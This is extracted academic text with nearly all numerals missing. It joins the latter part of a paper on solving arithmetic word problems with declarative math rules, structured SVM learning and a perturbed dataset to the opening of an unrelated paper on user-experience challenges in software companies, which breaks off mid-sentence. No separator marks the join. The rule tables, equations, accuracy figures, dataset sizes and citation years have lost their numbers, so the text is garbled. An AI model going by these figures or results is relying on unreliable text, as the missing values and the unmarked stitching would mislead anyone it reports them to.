transfer concept, and then choose an appropriate rule under the transfer to generate the operation. next we need to combine the sub-expression ( + ) with the number . however, our inference rules were designed for the combination of two num- bers only. in order to combine a sub-expression, we choose a representative number from the sub- expression, and use that number to determine the operation. in our example, we choose the number as the representative number for ( + ), and decide the operation between and , following a similar procedure as before. this operation is now used to combine ( + ) and . the representative number for a sub-expression is chosen such that it preserves the reasoning needed for the combination of this sub-expression with other numbers. we follow a heuristic to choose a representative number from a sub-expression: . for transfers and part-whole relationships, we choose the representative number of the left subtree. . in the case of rate relationship, we choose the number which does not have a rate component. transfer [verb ∈ have] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒− [verb ∈ have] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ + [verb ∈ have] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒− [verb ∈ (get ∪ construct)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒− [verb ∈ (get ∪ construct)] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ + [verb ∈ (get ∪ construct)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒− [verb ∈ (give ∪ destroy)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ + [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒− [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ + we also have another rule for each rule above, which states that if coref(subj , obj ) or coref(subj , obj ) is true, and none of the verbs is construct or destroy, the final operation is changed from addition to subtraction, or vice versa. dimensionality analysis [coref(unit , rate ) ∨ coref(unit , rate )] ⇒× [coref(unit , unit )] ∧ [rate = null] ⇒÷ [coref(unit , unit )] ∧ [rate = null] ⇒÷ (reverse order) explicit math [coref(subj , iobj ) ∨ coref(subj , iobj )] ∧ [math ∈ add ∨ math ∈ add] ⇒ + [coref(subj , iobj ) ∨ coref(subj , iobj )] ∧ [math ∈ sub ∨ math ∈ sub] ⇒− [coref(subj , subj )] ∧ [math ∈ add ∨ math ∈ add] ⇒− [coref(subj , subj )] ∧ [math ∈ sub ∨ math ∈ sub] ⇒ + [coref(subj , subj )] ∧ [math ∈ mul] ⇒÷ (reverse order) [coref(subj , subj )] ∧ [math ∈ mul] ⇒÷ [coref(subj , iobj ) ∨ coref(subj , iobj )] ∧ [math ∈ mul ∨ math ∈ mul] ⇒× part-whole relationship [sibling(number , number )] ⇒ + [hyponym(number , number )] ⇒− [hypernym(number , number )] ⇒− table : list of declarative rules used in our system. ÷ (reverse order) indicates the second number being divided by the first. to determine the order of subtraction, we always subtract the smaller number from the larger number. . in the case of explicit math, we choose the number which is not directly associated with the explicit math expression. . scoring answer derivations given the input word problem x, the solution math expression y is constructed by combining numbers in x with operations. we refer to the set of opera- tions used in an expression y as �(y). each opera- tion o in �(y) is generated by first choosing a con- cept ko, and then selecting a declarative rule ro from that concept. in order to discriminate between multiple candi- date solution expressions of a word problem x, we score them using a linear model over features ex- tracted from the derivation of the solution. our scor- ing function has the following form: score(x,y) = ∑ o∈�(y) wkφk(x,k o) + wrφr(x,r o) where φk(x,ko) and φr(x,ro) are feature vectors re- lated to concept ko, and declarative rule ro, respec- tively, and wk and wr are the corresponding weight vectors. the term wkφk(x,ko) is the score for the selection of ko, and the term wrφr(x,ro) is the score for the selection of ro. finally, the total score is the sum of the scores of all concepts and rule choices, over all operations of y. word problem tim ’s cat had kittens . he gave to jessica. then sara gave him kittens . how many kittens does he now have ? knowledge based answer derivation word problem mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? knowledge based answer derivation table : two examples of arithmetic word problems, and derivation of the answer. for each combination, first a math concept is chosen, and then a declarative rule from that concept is chosen to infer the operation. . learning we wish to estimate the parameters of the weight vectors wk and wr, such that our scoring function assigns a higher score to the correct math expres- sion, and a lower score to other competing math expressions. for learning the parameters, we as- sume access to word problems paired with the cor- rect math expression. in section , we show that certain simple heuristics and rate component anno- tations can be used to create somewhat noisy anno- tations for the concepts needed for individual op- erations. hence, we will assume for our formu- lation access to concept supervision as well. we thus assume access to m examples of the following form: {(x ,y ,{ko}o∈�(y )), (x ,y ,{ko}o∈�(y )), . . . , (xm,ym,{ko}o∈�(ym))}. we do not have any supervision for declarative rule selection, which we model as a latent variable. two stage learning: a straightforward solution for our learning problem could be to jointly learn wk and wr using latent structured svm. however, we found that this model does not perform well. in- stead, we chose a two stage learning protocol. at the first stage, we only learn wr, the weight vector for scoring the declarative rule choice. once learned, we fix the parameters for wr, and then learn the pa- rameters for wk. in order to learn the parameters for wr, we solve: min wr ||wr|| + c m∑ i= ∑ o∈�(yi) [ max r̂∈ko,r̂⇒ô wr ·φr(x, r̂)+ ∆(ô,o) ] − max r̂∈ko,r̂⇒o wr ·φr(x, r̂), where r̂ ∈ ko implies that r̂ is a declarative rule for concept ko, r̂ ⇒ o signifies that the declarative rule r̂ generates operation o, and ∆(ô,o) represents a measure of dissimilarity between operations o and ô. the above objective is similar to that of latent structured svm. for each operation o in the solu- tion expression yi, the objective tries to minimize the difference between the highest scoring rule from its concept ko, and highest scoring rule from ko which explains or generates the operation o. next we fix the parameters of wr, and solve: min wk ||wk|| + c m∑ i= max y∈y [score(xi,y) + ∆(y,yi)] − score(xi,yi). this is equivalent to a standard structured svm ob- jective. we use a − loss for ∆(ô,o). note that fixing the parameters of wr determines the scores for rule selection, removing the need for any latent variables at this stage. . inference given an input word problem x, inferring the best math expression involves computing arg maxy∈y score(x,y), where y is the set of all math expressions that can be created by combining the numbers in x with basic math operations. the size of y is exponential in the number of quantities mentioned in x. as a result, we perform approximate inference using beam search. we ini- tialize the beam with the set e of all numbers men- tioned in the problem x. at each step of the beam search, we choose two numbers (or sub-expressions) e and e from e, and then select a math concept and a declarative rule to infer an operation o. we cre- ate a new sub-expression e by combining the sub- expressions e and e with operation o. we finally create a new set e′ from e, by removing e and e from it, and adding e to it. we remove e from the beam, and add all such modified sets e′ to the beam. we continue this process until all sets in the beam have only one element in them. we choose the highest scoring expression among these elements as the solution expression. model and implementation details . supervision each word problem in our dataset is annotated with the solution math expression, along with alignment of numbers from the problem to the solution expres- sion. in addition, we also have annotations for the numbers which possess a rate component. an ex- ample is shown in fig . this is the same level of supervision used in roy and roth ( ). many of the annotations can be extracted semi-automatically. the number list is extracted automatically by a num- ber detector, the alignments require human supervi- sion only when the same numeric value is mentioned multiple times in the problem. most of the rate com- ponent annotations can also be extracted automati- cally, see roy and roth ( ) for details. we apply a few heuristics to obtain noisy anno- problem: mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? number list: , , solution: ( [ ] + [ ])/ [ ] = rates: figure : annotations in our dataset. number list refers to the numbers detected in the problem. the subscripts in the solution indicate the position of the numbers in the number list. tations for the math concepts for operations. con- sider the case for combining two numbers num and num , by operation o. we apply the following rules: . if we detect an explicit math pattern in the neighborhood of num or num , we assign concept ko to be explicit math. . if o is multiplication or division, and one of num or num has a rate component, we as- sign ko to be dimensional analysis. . if o is addition or subtraction, we check if the dependent verb of both numbers are identical. if they are, we assign ko to be a part-whole re- lationship; otherwise, we assign it to be trans- fer. we extract the dependent verb using the stanford dependency parser (chen and man- ning, ). the annotations obtained via these rules are of course not perfect. we could not detect certain uncommon rate patterns like “dividing the cost ways”, and “i read the same number of books days running”. there were part-whole relationships ex- hibited with complementary verbs, as in “i won games, and lost .”. both of these cases lead to noisy math concept annotations. however, we tested a small sample of these anno- tations, and found less than % of them to be wrong. as a result, we assume these annotations to be cor- rect in our problem formulation. . features we use dependency parse labels and a small set of rules to extract subject, indirect object, depen- dent verb, unit and rate component of each number mentioned in the problem. details of these extrac- tions can be found in the released codebase. us- ing these extractions, we define two feature func- tions φk(x,ko) and φr(x,ro), where x is the in- put word problem, and ko and ro are the concept and the declarative rule for operation o respectively. φr(x,r o) constitutes the following features: . if ro contains coref(·) function, we add fea- tures related to similarity of the arguments of coref(·) (jaccard similarity score and presence of pronoun in one of the arguments). . for part-whole relationships, we add indica- tors for a list of words like “remaining”, “rest”, “either”, “overall”, “total”, conjoined with the part-whole function in ro (hyponymy, hyper- nymy, sibling). . unigrams from the neighborhood of numbers being combined. finally, φk(x,ko) generates the following features: . if ko is related to dimensional analysis, we add features indicating the presence of a rate com- ponent in the combining numbers. . if ko is part-whole, we add features indicating whether the verbs of combining numbers are identical. note that these features capture several interpretable functions like coreference, hyponymy, etc. we do not learn three components of our system – verb classification for transfer knowledge, catego- rization of explicit math terms, and irrelevant num- ber detection. for verb classification, we use a seed list of around verbs for each category. given a new verb v, we choose the most similar verb v′ from the seed lists according to the glove vector (pen- nington et al., ) based similarity . we assign v the category of v′. this can be replaced by a learned component (hosseini et al., ). however we found the seed list based categorization worked well in most cases. for explicit math, we check for a small list of patterns to detect and categorize math terms. note that for both the cases above, we still have to learn coref(·) function to determine the fi- nal operation. finally, to detect irrelevant numbers (numbers which are not used in the solution), we use a set of rules based on the units of numbers. again, this can be replaced by a learned model (roy and roth, ). experiments . results on existing dataset we first evaluate our approach on the existing datasets of allarith, allarithlex, and allar- ithtmpl (roy and roth, ). allarithlex and al- larithtmpl are subsets of the allarith dataset, cre- ated to test the robustness to new vocabulary, and new equation forms respectively. we compare to the top performing systems for arithmetic word prob- lems. they are as follows: . template : template based algebra word problem solver of kushman et al. ( ). . lca++ : system of roy and roth ( ) based on lowest common ancestors of math expres- sion trees. . unitdep: unit dependency graph based solver of roy and roth ( ). we refer to our approach as knowledge. for all solvers, we use the system released by the respec- tive authors. the system of template expects an equation as the answer, whereas our dataset contains only math expressions. we converted expressions to equations by introducing a single variable and as- signing the math expression to it. for example, an expression “( + )” gets converted to “x = ( + )”. the first few columns of table shows the per- formance of the systems on the aforementioned datasets . the performance of knowledge is on par or lower than some of the existing systems. we analyzed the systems, and found most of them to not be robust to perturbations of the problem text; table shows a few examples. we further ana- lyzed the datasets, and identified several biases in the problems (in both train and test). systems which remember these biases get an undue advantage in evaluation. for example, the verb “give” only ap- pears with subtraction, and hence the models are results on the allarith datasets are slightly different from (roy and roth, ), since we fixed several ungrammatical sentences in the dataset system allarith allarith lex allarith tmpl aggregate aggregate lex aggregate tmpl train on allarith, test on perturb template . . . . . . . lca++ . . . . . . . unitdep . . . . . . . knowledge . . . . ∗ . ∗ . . ∗ table : accuracy in solving arithmetic word problems. all columns except the last report -fold cross validation results. ∗ indicates statistically significant improvement (p = . ) over second highest score in the column. problem systems which solved correctly trained on allarith trained on aggregate adam has marbles. adam gave marbles to sam. how many marbles does adam have now? template, unitdep, lca, knowledge lca, unitdep, knowledge adam has marbles. sam gave marbles to adam. how many marbles does adam have now? knowledge template, knowledge adam has marbles. sam has more marbles than adam. how many marbles does sam have? lca, unitdep, knowledge lca, unitdep, knowledge adam has marbles. adam has more marbles than sam. how many marbles does sam have? template, knowledge template, knowledge table : pairs of pertubed problems, along with the systems which get them correct learning an erroneous correlation of “give” with sub- traction. since the test also exhibits the same bias, these systems get all the “give”-related questions correct. however, they fail to solve the problem in table , where “give” results in addition. we also tested knowledge on the addition subtraction problems dataset released by hosseini et al. ( ). it achieved a cross validation accuracy of . %, which is competitive with the state of the art accu- racy of % achieved with the same level of supervi- sion. the system of mitra and baral ( ) achieved . % accuracy on this dataset, but requires rich annotations for formulas and alignment of numbers to formulas. . new dataset creation in order to remove the aforementioned biases from the dataset, we augment it with new word problems collected via a crowdsourcing platform. these new word problems are created by perturbing the original problems minimally, such that the answer is differ- ent from the original problem. for each word prob- lem p with an answer expression a in our original dataset allarith, we replace one operation in a to create a new math expression a′. we ask annotators to modify problem p minimally, such that a′ is now the solution to the modified word problem. we create a′ from a either by replacing an addi- tion with subtraction or vice versa, or by replacing multiplication with division or vice versa. we do not replace addition and subtraction with multiplication or division, since there might not be an easy per- turbation that supports this conversion. we only al- lowed perturbed expressions which evaluate to val- ues greater than . for example, we generate the expression “( + )” from “( - )”; we generated ex- pressions “( + )/ ” and “( - )* ” for the expres- sion “( - )/ ”. we generate all possible perturbed expressions for a given answer expression, and ask for problem text modification for each one of them. we show the annotators the original problem text p paired with a perturbed answer a′. the instructions advised them to copy over the given problem text, and modify it as little as possible so that the given math expression is now the solution to this modified problem. they were also instructed not to add or delete the numbers mentioned in the problem. if the original problem mentions two “ ”s and one “ ”, the modified problem should also contain two “ ”s and one “ ”. we manually pruned problems which did not yield the desired solution a′, or were too different from the input problem p. this procedure gave us a set of new word problems, which we refer to as perturb. finally we augment allarith with the problems of perturb, and call this new dataset ag- gregate. aggregate has a total of problems. the addition of the perturb problems ensures that the dataset now has problems with similar lex- ical items generating different answers. this mini- mizes the bias that we discussed in subsection . . to quantify this, consider the probability distribu- tion over operations for a quantity q, given that word w is present in the neighborhood of q. for an un- biased dataset, you will expect the entropy of this distribution to be high, since the presence of a sin- gle word in a number neighborhood will seldom be completely informative for the operation. we com- pute the average of this entropy value over all num- bers and neighborhood words in our dataset. allar- ith and perturb have an average entropy of . and . respectively, whereas aggregate’s average en- tropy is . , indicating that, indeed, the complete data set is significantly less biased. . generalization from biased dataset first, we evaluate the ability of systems to general- ize from biased datasets. we train all systems on allarith, and test them on perturb (which was cre- ated by perturbing allarith problems). the last col- umn of table shows the performance of systems in this setting. knowledge outperforms all other systems in this setting with around % absolute im- provement over unitdep. this shows that declara- tive knowledge allows the system to learn the correct abstractions, even from biased datasets. . results on the new dataset finally, we evaluate the systems on the aggre- gate dataset. following previous work (roy and roth, ), we compute two subsets of aggregate comprising problems each, using the mawps (koncel-kedziorski et al., ) system. the first, called aggregatelex, is one with low lexical repeti- tions, and the second called aggregatetmpl is one with low repetitions of equation forms. we also evaluate on these two subsets on a -fold cross val- idation. columns - of table show the perfor- mance of systems on this setting. knowledge sig- nificantly o utperforms o ther s ystems o n aggregate and aggregatelex, and is similar to unitdep on aggregatetmpl. there is a % absolute improve- ment on aggregatelex, showing that knowledge is significantly m ore r obust t o l ow l exical overlap between train and test. the last column of table also shows that the other systems do not learn the right abstraction, even when trained on aggregate. . analysis coverage of the declarative rules we chose math concepts and declarative rules based on their prevalance in arithmetic word problems. we found that the four concepts introduced in this paper cover almost all the problems in our dataset; only missing problems involving application of area formulas. we also checked earlier arithmetic problem datasets from the works of hosseini et al. ( ); roy and roth ( ), and found that the math concepts and declarative rules introduced in this paper cover all their problems. a major challenge in applying these concepts and rules to algebra word problems is the use of variables in constructing equations. variables are often im- plicitly described, and it is difficult to extract units, dependent verbs, associated subjects and objects for the variables. however, we need these extractions in order to apply our declarative rules to combine vari- ables. there has been some work to extract meaning of variables (roy et al., ) in algebra word prob- lems; an extension of this can possibly support the application of rules in algebra word problems. we leave this exploration to future work. higher standard word problems often require the application of math formulas like ones related to area, interest, probability, etc. extending our ap- proach to handle such problems will involve en- coding math formulas in terms of concepts and rules, as well as adding concept specific features to the learned predictors. the declarative rules under the explicit math category currently handles sim- ple cases; this set needs to be augmented to handle complex number word problems found in algebra datasets. gains achieved by declarative rules table isabel had pages of math homework and pages of reading homework. if each page had prob- lems on it, how many problems did she have to complete total ? tim’s cat had kittens. he gave to jessica and to sara . he now has kittens . how many kittens did he have to start with ? mrs. snyder made heart cookies. she made red cookies, and the rest are pink. how many pink cookies did she make? table : examples which knowledge gets correct, but unitdep does not. shows examples of problems which knowledge gets right, but unitdep does not. the gains can be attributed to the injection of declarative knowl- edge. earlier systems like unitdep try to learn the reasoning required for these problems from the data alone. this is often difficult in the presence of lim- ited data, and noisy output from nlp tools. in con- trast, we learn probabilistic models for interpretable functions like coreference, hyponymy, etc., and then use declarative knowledge involving these functions to perform reasoning. this reduces the complexity of the target function to be learned considerably, and hence we end up with a more robust model. effect of beam size we used a beam size of in all our experiments. however, we found that vary- ing the beam size does not effect the performance significantly. even lowering the beam size to reduced performance by only %. weakness of approach a weakness of our method is the requirement to have all relevant declarative knowledge during training. many of the component functions (like coreference) are learned through la- tent alignments with no explicit annotations. if too many problems are not explained by the knowledge, the model will learn noisy alignments for the com- ponent functions. table shows the major categories of errors with examples. % of the errors are due to extraneous number detection. we use a set of rules based on units of numbers, to detect such irrelevant numbers. as a result, we fail to detect numbers which are ir- relevant due to other factors, like associated entities, or associated verb. we can potentially expand our rule based system to detect those, or replace it by a learned module like roy and roth ( ). another irrelevant number detection ( %) sally had baseball cards, and were torn. sara bought of sally’s baseball cards . how many baseball cards does sally have now? parsing rate component ( %) mary earns $ cleaning a home. how many homes did she clean, if she made dollars? coreference ( %) there are people on the green bay high track team. if a relay race is meters long, how far will each team member have to run? table : examples of errors made by knowledge major source of errors is parsing of rate components; that is, understanding “earns $ cleaning a home” should be normalized to “$ per home”. although we learn a model for coreference function, we make several mistakes related to coreference. for the ex- ample in table , we fail to detect the coreference between “team member” and “people”. conclusion in this paper, we introduce a framework for incorpo- rating declarative knowledge in word problem solv- ing. our knowledge based approach outperforms all other systems, and also learns better abstractions from biased datasets. given that the variability in text is much larger than the number of declarative rules that governs math word problems, we believe that this is a good way to introduce math knowledge to a natural language understanding system. conse- quently, future work will involve extending our ap- proach to handle a wider range of word problems, possibly by supporting better grounding of implicit variables and including a larger number of math con- cepts and declarative rules. an orthogonal explo- ration direction is to apply these techniques to gen- erate summaries of financial or sports news, or gen- erate statistics of war or gun violence deaths from news corpora. a straightforward approach can be to augment news documents with a question asking for the required information, and treating this aug- mented news document as a math word problem. code and dataset are available at https:// github.com/cogcomp/arithmetic. acknowledgments we are grateful to anonymous reviewers for their in- sightful comments. this work is funded by darpa under agreement number fa - - - , and a grant from the allen institute for artificial intelli- gence (allenai.org). references yonatan bisk and julia hockenmaier. . simple ro- bust grammar induction with combinatory categorial grammars. in proceedings of the twenty-sixth confer- ence on artificial intelligence (aaai- ), pages – , toronto, canada, july. ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint- driven learning. in proceedings of the annual meet- ing of the association for computational linguistics (acl), pages – , prague, czech republic, . association for computational linguistics. ming-wei chang, lev ratinov, and dan roth. . structured learning with constrained conditional mod- els. machine learning, ( ): – , . danqi chen and christopher d. manning. . a fast and accurate dependency parser using neural networks. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. james clarke, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in proc. of the conference on com- putational natural language learning (conll), . gerald dejong. . investigating explanation-based learning. kluwer international series in engineering and computer science. kluwer academic publishers. gerald dejong. . explanation-based learning. in t. gonzalez, j. diaz-herrera, and a. tucker, editors, crc computing handbook: computer science and software engineering, pages . – . . crc press, boca raton. kuzman ganchev, joao graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research. kevin gimpel and mohit bansal. . weakly- supervised learning with cost-augmented contrastive estimation. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar, octo- ber. association for computational linguistics. mark hopkins, cristian petrescu-prahova, roie levin, ronan le bras, alvaro herrasti, and vidur joshi. . beyond sentential semantic parsing: tack- ling the math sat with a cascade of tree transducers. in proceedings of the conference on empirical methods in natural language processing, pages – , copenhagen, denmark, september. association for computational linguistics. mohammad javad hosseini, hannaneh hajishirzi, oren etzioni, and nate kushman. . learning to solve arithmetic word problems with verb categorization. in proceedings of the conference on empirical methods for natural language processing (emnlp). danqing huang, shuming shi, chin-yew lin, and jian yin. . learning fine-grained expressions to solve math word problems. in proceedings of the con- ference on empirical methods in natural language processing, pages – , copenhagen, denmark, september. association for computational linguis- tics. robin jia and percy liang. . adversarial exam- ples for evaluating reading comprehension systems. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics, september. daniel khashabi, tushar khot, ashish sabharwal, peter clark, oren etzioni, and dan roth. . ques- tion answering via integer programming over semi- structured knowledge. in proceedings of the interna- tional joint conference on artificial intelligence (ij- cai). rik koncel-kedziorski, hannaneh hajishirzi, ashish sabharwal, oren etzioni, and siena ang. . pars- ing algebraic word problems into equations. trans- actions of the association of computational linguis- tics. rik koncel-kedziorski, subhro roy, aida amini, nate kushman, and hannaneh hajishirzi. . mawps: a math word problem repository. in proceedings of the conference of the north american chapter of the association for computational linguistics. nate kushman, luke zettlemoyer, regina barzilay, and yoav artzi. . learning to automatically solve algebra word problems. in proceedings of the annual meeting of the association for computational linguis- tics (acl), pages – . percy liang, michael jordan, and dan klein. . learning dependency-based compositional semantics. in proceedings of the annual meeting of the associa- tion for computational linguistics (acl). wang ling, dani yogatama, chris dyer, and phil blun- som. . program induction by rationale gener- ation: learning to solve and explain algebraic word problems. in proceedings of the th annual meeting of the association for computational linguistics. takuya matsuzaki, takumi ito, hidenao iwane, hirokazu anai, and noriko h. arai. . semantic parsing of pre-university math problems. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , vancouver, canada, july. association for computational linguistics. arindam mitra and chitta baral. . learning to use formulas to solve simple arithmetic problems. in pro- ceedings of the th annual meeting of the association for computational linguistics. tahira naseem, harr chen, regina barzilay, and mark johnson. . using universal linguistic knowl- edge to guide grammar induction. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language process- ing (emnlp). dan roth and wen-tau yih. . a linear program- ming formulation for global inference in natural lan- guage tasks. in hwee tou ng and ellen riloff, edi- tors, proceedings of the conference on computational natural language learning (conll), pages – . as- sociation for computational linguistics. subhro roy and dan roth. . solving general arith- metic word problems. in proc. of the conference on empirical methods in natural language processing (emnlp). subhro roy and dan roth. . unit dependency graph and its application to arithmetic word problem solving. in proceedings of the conference on artifi- cial intelligence (aaai). subhro roy, shyam upadhyay, and dan roth. . equation parsing: mapping sentences to grounded equations. in proceedings of the conference on empirical methods in natural language processing (emnlp). shuming shi, yuehui wang, chin-yew lin, xiaojiang liu, and yong rui. . automatically solving num- ber word problems by semantic parsing and reasoning. in empirical methods in natural language process- ing. noah smith and jason eisner. . annealing struc- tural bias in multilingual weighted grammar induction. in proceedings of the annual meeting of the associ- ation for computational linguistics (acl), acl- , pages – , stroudsburg, pa, usa. association for computational linguistics. shyam upadhyay, ming-wei chang, kai-wei chang, and wen-tau yih. . learning from explicit and implicit supervision jointly for algebra word problems. in proceedings of the conference on empirical methods in natural language processing. lipu zhou, shuaixiang dai, and liwei chen. . learn to solve algebra word problems using quadratic programming. in proceedings of the conference on empirical methods in natural language process- ing. submitted may accepted august published october corresponding author pariya kashfi, pariya.kashfi@chalmers.se, p@puix.org academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright kashfi et al. distributed under creative commons cc-by . open access integrating user experience practices into software development processes: implications of the ux characteristics pariya kashfi, agneta nilsson and robert feldt department of computer science and engineering, chalmers university of technology and gothenburg university, gothenburg, sweden abstract user experience (ux) is a key factor in the success of software systems. many software companies face challenges in their work with ux. existing research does not analyze ux practices and challenges in relation to other software quality characteristics or, in particular, in relation to usability. a better understanding of these challenges can help researchers and practitioners better address them in the future. in this empirical study, we have interviewed practitioners with different backgrounds and occupations from eight software development companies. their responses are coded, and analyzed with thematic analysis. we report eight themes of challenges that practitioners face in their work with ux. while some of these challenges partly overlap with those reported in existing literature about usability or other software quality characteristics, the participants of our study either view many of the challenges as unique to ux, or more severe in the case of ux. although at a superficial level challenges of ux and other quality characteristics overlap, we differentiate these challenges at a deeper level through the five main characteristics of ux: subjective, holistic, dynamic, context- dependent and worthwhile. in particular, we identified that these characteristics have at least implications (i.e. additional difficulties) for day-to-day work of practitioners. we found that of these implications have been previously reported in literature. however, to the best of our knowledge, the remaining nine implications are unique to our study. these implications can explain why practitioners perceive the challenges to be more severe than for other quality characteristics. most importantly, they can explain the industry’s lopsided focus on the pragmatic aspect of ux. our findings can be useful for researchers in identifying new and industry-relevant research areas and for practitioners to learn from empirically investigated challenges in ux work, and base their improvement efforts on such knowledge. identifying and investigating the overlaps underlines the importance of these challenges, and can also help finding research areas not only for enhancing ux work but also software quality in general. it also makes it easier for practitioners to spot, better understand as well as find mitigation strategies for ux, through learning from past experiences and developments in the area of software quality. subjects human-computer interaction, software engineering keywords usability, software quality, quality requirements, user experience, non-functional requirements how to cite this article kashfi et al. ( ), integrating user experience practices into software development processes: implications of the ux characteristics. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:pariya.kashfi@chalmers.se mailto:p@puix.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. introduction as the software industry has matured, the demands that society puts on the quality of software systems have increased. it is no longer enough to focus only on the many functions that a piece of software should supply. to deliver a system that is consistent and of high quality there are a large number of characteristics that need to be considered (chung et al., ). some, such as testability, are internal or relate to the development process and mainly concern developers, while others such as performance and usability, are critical for users (international organisation for standardisation (iso), ). at an even broader level, the actual experience of the end users as they interact with the software needs to be taken into account. recently, this widening scope of software quality characteristics has led to the introduction and study of the concept of user experience (ux). even though different definitions of ux exist, they share the same essence: ux is a user’s holistic perception of functionality and quality characteristics of a piece of software (hassenzahl, ; wright & mccarthy, ; jordan, ). in general, ux literature emphasizes that assuring efficiency and effectiveness during use of the software, i.e high usability, does not guarantee that the end users will have a positive experience (hassenzahl, ). however, the perception of ux is generally different in academic and industrial contexts: whereas the former concentrates on hedonic aspects and emotions, the latter focuses more on functionality and usability issues (väänänen-vainio-mattila, roto & hassenzahl, ). current ux models (e.g., hassenzahl, ; wright & mccarthy, ) differ in their view on how various underlying elements and processes contribute to forming the end user’s overall experience with products and services. one of the well-known ux models is developed by hassenzahl (hassenzahl, ). it breaks ux down into pragmatic and hedonic attributes. pragmatic attributes concern usability and functionality of software (e.g., clear, supporting, useful and controllable). hedonic attributes, on the other hand, concern communicating identity, provoking memories, and providing stimulation (e.g., outstanding, impressive, exciting, and interesting). these attributes emphasize individuals’ psychological well-being. an end user’s perception of these attributes leads to a judgment about the product’s appeal (e.g., ‘‘it is good/bad’’), emotional consequences (e.g., pleasure, satisfaction) and behavioral consequences (e.g., increased time spent with the product). while pragmatic attributes concern achieving do-goals, hedonic attributes concern satisfying be-goals (hassenzahl, ). do-goals are the concrete outcome that the end user wishes to achieve whereas be-goals rest in essential human needs. to provide a better understanding of ux, hassenzahl (hassenzahl, ) emphasizes five characteristics of ux: subjective, holistic, dynamic, context-dependent and worthwhile. all software systems deliver some ux, positive or not, whether the ux has explicitly been taken into account during development. research has shown that certain practices can increase the likelihood of delivering a desirable ux (hassenzahl, ) (hereafter, ux practices). however, simply applying these practices in isolation is not enough (abrahão et al., ; ferreira, sharp & robinson, ; ovad & larsen, ). like methods and practices used to support other software quality characteristics (chung et al., ), they need to be integrated into development processes and considered throughout projects. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nevertheless, ux is often neglected in software projects and the ux state-of-practice is immature (abrahão et al., ; isomursu et al., ; law & abrahão, ). in order to improve the state-of-practice, we must first understand and address challenges that practitioners face in their everyday work with ux (hereafter ux challenges). to achieve this, the distinctions and interrelations between ux, usability and other software quality characteristics must first be properly analyzed. a number of studies claim to have studied ux challenges, but their results need to be interpreted with caution because they treat ux and usability as interchangeable (e.g., cajander, lárusdóttir & gulliksen, ; ardito et al., ; lanzilotti et al., ), or examine ux in isolation so its relation to usability and other software quality characteristics is not recognized (e.g., isomursu et al., ; vermeeren et al., ). our study aims to complement the current body of knowledge by investigating ux challenges while explicitly differentiating ux and usability. in doing so, we discuss these challenges in relation to the unique characteristics of ux. we also contribute to the current literature by providing an explanation for the industry’s lopsided focus on the pragmatic aspect of ux. also, in our analysis, we examine how the handling of ux compares to the handling of general software quality characteristics, especially usability. here, we report our findings and answer the following research questions: what challenges do practitioners face when integrating ux practices into software development processes and organizations?, and how do ux challenges relate to challenges of handling software quality characteristics, in particular usability? our findings can be useful for researchers in identifying new and industry-relevant research areas, and for practitioners in learning from empirically investigated ux challenges, and basing their improvement efforts on such knowledge. the structure of this paper is as follows: the second section provides background on the topic and summarizes the related literature. the third section describes our research methodology and presents the different research sites. the fourth section presents the results from our study: the identified themes of challenges. the fifth section discusses our findings and puts them in relation to the current literature. the last section concludes our study and suggests future research. background and related work this section elaborates on the characteristics of ux and their implications for ux work. understanding these characteristics is important when analyzing and discussing our findings on ux challenges because it provides a basis for comparing and contrasting ux with usability and other software quality characteristics. this section also summarizes related empirical studies on software quality characteristics, in particular, usability and ux. ux is dominated by subjective aspects of human perception (wright & mccarthy, ; hassenzahl, ). for instance, one user may perceive particular software features as simple, novel, and admirable while another may perceive them as complicated and old. other software quality characteristics can be treated more objectively, at least in theory (kashfi et al., ). the term subjective has also been used in requirements literature to highlight that since quality characteristics are hard to measure, practitioners tend to judge them based on their personal opinion (chung et al., ; paech & kerlow, ). kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. here, we use this term to refer to its meaning in the context of ux. currently, the most efficient and feasible approach to measure perception and emotion of users is to directly gather their opinions, and let them express themselves (law, van schaik & roto, ). this is often performed through questionnaires or scales (e.g., attrakdiff, self-assessment manikin, affect gird zimmermann, ). however, to gain reliable results, practitioners need to gather responses from statistically significant number of heterogeneous users (law, van schaik & roto, ). ux is also holistic and not totally reducible to its complexly intertwined underlying elements (hassenzahl, ). ux emerges from underlying functionality and quality characteristics of software, and the user’s perception of them in a given situation (hassenzahl, ). the holistic nature of ux resembles the cross-cutting nature 